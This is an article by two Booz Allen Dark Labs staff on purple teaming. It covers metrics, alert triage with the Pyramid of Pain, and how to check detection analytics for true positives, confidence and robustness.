White hat hackers who test systems for organizations or red teams have been staples of cybersecurity since the 1990s. As cyber threats have grown in scope and sophistication, so have the tactics of the adversaries – and red teams right along with them. Today, red teams proactively simulate nation-state level threat actors to keep an organization’s defenders on their toes and, in some cases, join forces with blue teams to attack and defend simultaneously in real-time.
More organizations are realizing the benefits of coordinating and collaborating across red and blue teams – forming “purple” teams where attackers and defenders work together. These joint teams can simulate more aggressive attack environments, conduct more complex “what-if” scenarios, and collaborate side-by- side to understand outcomes. When effectively deployed and supported, purple teams can help organizations get ahead of attacks by finding and fixing potential vulnerabilities before the adversary can exploit them.
Purple teaming can help alleviate many lingering questions organizations can harp on to determine resources or ensure effectiveness by easily integrating into existing team processes and workflows. Furthermore, this easy integration can let organizations have one focused security program to address its needs instead of multiple programs that can create information silos and require frequent updates.
It’s important to note that before companies start adding new members to their purple team activities, try equipping existing teams with the right tactics and approaches. Here are some suggestions based on our experience supporting red, blue, and purple teams across industry sectors from Fortune 500s to the federal government.
Track progress with the right metrics
As the classic adage advises: security teams can only manage what they can measure —and the right measurements are particularly important in cybersecurity and purple teaming. Security teams need to know if their processes are quantifiably improving company defenses over time.
The most obvious measure: Is the gap decreasing between known and emulated threats and the organization’s ability to detect them?
Security teams should also consider measuring the number of threats they successfully emulate in which detection signatures correspond to true positives; the number of attacks and detections that map to MITRE’s ATT&CK framework; new analytics for high confidence and low false positives; and increased coverage for specific tactics, techniques, and procedures
Process also matters. Purple teams tend to work best in short iterations, with metrics that encourage collaboration rather than red and blue teams working at odds.
Sharpen the team’s alerts
The increased coverage and visibility from endpoint and network sensors coupled with today’s expanding attack surface brings an increase in alerts. For cybersecurity analysts, this creates alert fatigue.
As a remedy, we recommend starting with the oft-cited “Pyramid of Pain,” which classifies indicators of compromise (IOCs) on two criteria: the difficulty (pain) it takes to collect the indicators and apply them to cyber defenses and the amount of pain the team can inflict on cyber adversaries. By shifting focus toward the top of the pyramid, the team moves beyond static signatures to more robust and proactive behavioral detections, forcing adversaries to significantly change their tactics and spend more resources to make successful attacks.
Purple teams also benefit from examining the data collection behind these alerts by asking:
- Is the company monitoring and collecting the right data?
- What data should the team keep and for how long?
- Does the team trust all the rules, watchlists, and alerts from vendors and third parties?
With answers to these questions, the team can make its existing tools more effective by customizing them to the company’s environment.
After identifying adversary tradecraft and creating behavioral analytics, look at strengthening them. Evaluate analytics for:
- Validation of true positives. Have the analytics been validated against an actual attack, ensuring that they will detect what’s expected? Without a true positive test case, purple teams are often lulled into a false sense of security as mistakes slip through the cracks. Examples are typos or syntax errors, a misinterpretation or false assumption made by the analytic author, or a misinformed or misrepresented attack in the threat intelligence source.
- Confidence. How often do the analytics produce false positives? Make sure the team has an acceptable number of results. As in other areas of security, consider a defense-in-depth approach with multiple analytics covering the same techniques at different confidence levels. And consider the context, intelligence about what activities are “normal” can’t be gleaned from an alert or event log. The team may need to enrich its analytics with other sources of data.
- Robustness. How effectively do the analytics detect different variations of an attack? These are often very subtle, like command line parameters being in a different order, or the use of additional spaces. Keep in mind that as an analytic becomes more robust, it also may pick up more false positives.
As the team considers our recommendations, remember that purple team programs are not a silver bullet. They must become part of a larger, integrated model of cybersecurity that include the following:
- Common management and leadership. Define collective goals that drive risk reduction across the cyber defense team.
- Processes that encourage frequent communication. Break down siloes and encourage integrated approaches to historically separated operational teams.
- Metrics that track and encourage collaboration. Incentivize openness in reporting measurements and gamify the experience where possible
- Functions that build upon previous activities to remove risk from the system. Take advantage of existing data sources and tools and optimize risk activities across the cybersecurity program portfolio.
These tactics can help the company maintain momentum in its purple teaming efforts to build resiliency into the security of the organization ahead of an attack – sharpening the organization’s ability to detect, prevent, and respond to adversarial actions.
Timothy Nary, red team capability lead; Clayton Barlow-Wilcox, product manager, Booz Allen Dark Labs Team